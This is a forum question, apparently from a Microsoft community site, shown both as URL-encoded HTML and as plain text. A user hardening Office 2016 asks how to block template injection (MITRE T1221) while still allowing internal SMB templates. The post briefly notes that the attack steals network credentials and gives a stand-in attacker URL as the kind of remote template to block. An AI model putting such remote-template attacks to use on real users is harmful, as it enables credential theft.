Defending against template injection attacks?

%3CLINGO-SUB%20id%3D%22lingo-sub-644303%22%20slang%3D%22en-US%22%3EDefending%20against%20template%20injection%20attacks%3F%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-644303%22%20slang%3D%22en-US%22%3E%3CP%3E%3CSPAN%3EI'm%20running%20Office%202016%20on%20Windows%2010%2C%20fully%20patched.%20Now%20working%20on%20hardening%20Office%20to%20make%20sure%20that%20users%20cannot%20make%20insecure%20decisions%20when%20they%20receive%20malicious%20files.%3C%2FSPAN%3E%3C%2FP%3E%3CP%3E%26nbsp%3B%3C%2FP%3E%3CP%3E%3CSPAN%3ETemplate%20injection%20works%20pretty%20well%20and%20was%20used%20in%20the%20past%20in%20hacks.%20Using%20publicly%20available%26nbsp%3Btools%20it's%20easy%20to%20get%20the%20attack%20working%20in%20under%2010%20minutes%2C%20stealing%20network%20credentials%20from%20users%20that%20open%20the%20file.%20However%20I%20cannot%20find%20any%20technical%20mitigation%20technique...%20See%20e.g.%26nbsp%3B%3CA%20title%3D%22https%3A%2F%2Fattack.mitre.org%2Ftechniques%2FT1221%2F%22%20href%3D%22https%3A%2F%2Fattack.mitre.org%2Ftechniques%2FT1221%2F%22%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%20nofollow%22%3Ehttps%3A%2F%2Fattack.mitre.org%2Ftechniques%2FT1221%2F%3C%2FA%3E%26nbsp%3Bfor%20details.%3C%2FSPAN%3E%3C%2FP%3E%3CP%3E%26nbsp%3B%3C%2FP%3E%3CP%20class%3D%22%22%3E%3CSPAN%3EQuestion%3A%20how%20to%20fix%20this%20issue%3F%20And%20in%20such%20a%20way%20that%20local%20SMB%20templates%20on%20shares%20(%5C%5Cmycompany%5Cdocuments%5Ctemplates)%20*can*%20be%20opened%20and%20remote%20https%20shares%20(%3CA%20href%3D%22https%3A%2F%2Fattacker.com%2Fmaliciousstuff%22%20target%3D%22_blank%22%20rel%3D%22nofollow%20noopener%20noreferrer%22%3Ehttps%3A%2F%2Fattacker.com%2Fmaliciousstuff%3C%2FA%3E)%20will%20be%20blocked.%3C%2FSPAN%3E%3C%2FP%3E%3C%2FLINGO-BODY%3E
New Contributor

I'm running Office 2016 on Windows 10, fully patched. Now working on hardening Office to make sure that users cannot make insecure decisions when they receive malicious files.

 

Template injection works pretty well and was used in the past in hacks. Using publicly available tools it's easy to get the attack working in under 10 minutes, stealing network credentials from users that open the file. However I cannot find any technical mitigation technique... See e.g. https://attack.mitre.org/techniques/T1221/ for details.

 

Question: how to fix this issue? And in such a way that local SMB templates on shares (\\mycompany\documents\templates) *can* be opened and remote https shares (https://attacker.com/maliciousstuff) will be blocked.

0 Replies